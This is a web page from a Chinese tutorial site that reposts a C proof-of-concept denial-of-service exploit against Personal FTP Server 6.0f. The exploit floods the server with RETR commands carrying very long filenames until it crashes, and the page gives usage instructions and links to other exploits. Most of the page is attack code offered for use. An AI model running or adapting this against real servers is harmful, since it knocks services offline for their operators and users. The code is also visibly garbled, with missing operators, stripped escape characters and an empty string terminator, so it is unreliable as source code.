手机
当前位置:查字典教程网 >网络安全 >Exploit >The Personal FTP Server 6.0f RETR Denial of Service Exploit
The Personal FTP Server 6.0f RETR Denial of Service Exploit
摘要:/****ThePersonalFTPServer6.0fRETRDOSexploit***Avulnerabilityexistsinth...

/*

*** The Personal FTP Server 6.0f RETR DOS exploit *** A vulnerability exists in the way Personal FTP Server handles

multiple RETR commands with overly long filenames.When confronted

with such consecutive requests the server will crash. Usage : ./pftpdos ip port user password

Ex. : ./pftpdos 127.0.0.1 21 test test Personal FTP Server homepage: http://www.michael-roth-software.de/ Discovey POC by Shinnok raydenxy [at] yahoo <dot> com

http://shinnok.evonet.ro */ #include <stdio.h>

#include <stdlib.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <string.h>

#include <malloc.h>

#include <errno.h> int

min (int x, int y)

{

if (x < y)return x;

else

return y;

}

extern int errno; int

main (int argc, char *argv[])

{

struct sockaddr_in server;

int i, t, s;

char *req, *buff;

s = socket (AF_INET, SOCK_STREAM, 0);

bzero (&server, sizeof (server));

server.sin_family = AF_INET;

server.sin_addr.s_addr = inet_addr (argv[1]);

server.sin_port = htons (atoi (argv[2]));

connect (s, (struct sockaddr *) &server, sizeof (struct sockaddr));

req = malloc (sizeof (char) *

(((strlen (argv[3]) - strlen (argv[4]))

min (strlen (argv[3]), strlen (argv[4])) 8)));

sprintf (req, "USER %sxDxA", argv[3]);

write (s, req, strlen (req));

sprintf (req, "PASS %sxDxA", argv[4]);

write (s, req, strlen (req));

free (req);

for (i = 1; i <= 5; i )

{

t = (sizeof (char) * 1000 * i);

buff = malloc (t 1);

memset (buff, 'A', t);

buff[t 1] = '';

req = malloc (t 9);

sprintf (req, "RETR %sxDxA", buff);

if (write (s, req, strlen (req)) == -1)

{

perror (NULL);

printf ("Target pwned!n", errno);

}

free (req);

free (buff);

sleep (1);

}

close (s);

return (EXIT_SUCCESS);

}

【The Personal FTP Server 6.0f RETR Denial of Service Exploit】相关文章:

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

WS_FTP Home/Professional FTP Client Remote Format String PoC

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit

精品推荐
分类导航